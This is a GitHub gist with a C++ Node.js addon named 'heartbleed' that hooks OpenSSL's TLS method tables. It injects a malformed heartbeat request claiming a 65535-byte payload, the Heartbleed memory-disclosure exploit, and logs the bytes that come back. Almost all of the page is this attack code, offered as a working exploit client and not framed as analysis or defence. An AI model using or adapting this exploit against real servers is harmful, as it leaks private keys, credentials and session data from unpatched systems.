-
-
Save indutny/82d6f9874952f3a4915e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "heartbleed.h" | |
#include "openssl/err.h" | |
namespace heartbleed { | |
using namespace node; | |
using namespace v8; | |
template <MethodFunction M> | |
CtrlFunction SSLWrapper<M>::ssl_ctrl_; | |
template <MethodFunction M> | |
ReadBytesFunction SSLWrapper<M>::ssl_read_; | |
template <MethodFunction M> | |
SSLWrapper<M>::SSLWrapper() { | |
ssl_ctrl_ = M()->ssl_ctrl; | |
ssl_read_ = M()->ssl_read_bytes; | |
const_cast<SSL_METHOD*>(M())->ssl_ctrl = Ctrl; | |
const_cast<SSL_METHOD*>(M())->ssl_read_bytes = ReadBytes; | |
/* | |
method->ssl_read_bytes =; | |
+ s2n(fake, p); | |
+ ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3); | |
*/ | |
} | |
template <MethodFunction M> | |
long SSLWrapper<M>::Ctrl(SSL* s, int cmd, long larg, void* parg) { | |
if (cmd != SSL_CTRL_GET_SESSION_REUSED) | |
return ssl_ctrl_(s, cmd, larg, parg); | |
// Faking out get session reused, | |
void* buf = OPENSSL_malloc(3); | |
uint16_t size = 65535; | |
reinterpret_cast<uint8_t*>(buf)[0] = TLS1_HB_REQUEST; | |
reinterpret_cast<uint8_t*>(buf)[1] = size >> 8; | |
reinterpret_cast<uint8_t*>(buf)[2] = (size & 0xff) | 1; | |
fprintf(stdout, "sent %d\n", size); | |
M()->ssl_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3); | |
return 0; | |
} | |
template <MethodFunction M> | |
int SSLWrapper<M>::ReadBytes(SSL* s, | |
int type, | |
unsigned char* buf, | |
int len, | |
int peek) { | |
fprintf(stdout, "%d: %d %d %d %d <- %d\n", s->rstate, buf[0], buf[1], buf[2], buf[3], len); | |
return ssl_read_(s, type, buf, len, peek); | |
} | |
template <MethodFunction M> | |
void SSLWrapper<M>::ProcessHeartbeat(SSL* ssl) { | |
fprintf(stdout, "got\n"); | |
} | |
static SSLWrapper<TLSv1_method> t1; | |
static SSLWrapper<TLSv1_client_method> t1_client; | |
static SSLWrapper<TLSv1_1_method> t11; | |
static SSLWrapper<TLSv1_1_client_method> t11_client; | |
static SSLWrapper<TLSv1_2_method> t12; | |
static SSLWrapper<TLSv1_2_client_method> t12_client; | |
static void Initialize(Handle<Object> target) { | |
} | |
} // namespace heartbleed | |
NODE_MODULE(heartbleed, heartbleed::Initialize); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "node.h" | |
#include "v8.h" | |
#include "openssl/ssl.h" | |
namespace heartbleed { | |
typedef const SSL_METHOD* (*MethodFunction)(void); | |
typedef long (*CtrlFunction)(SSL*, int, long, void*); | |
typedef int (*ReadBytesFunction)(SSL*, int, unsigned char*, int, int); | |
template <MethodFunction M> | |
class SSLWrapper { | |
public: | |
SSLWrapper(); | |
protected: | |
static long Ctrl(SSL* s, int cmd, long larg, void* parg); | |
static int ReadBytes(SSL* s, int type, unsigned char* buf, int len, int peek); | |
static void ProcessHeartbeat(SSL* ssl); | |
static CtrlFunction ssl_ctrl_; | |
static ReadBytesFunction ssl_read_; | |
}; | |
} // namespace heartbleed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment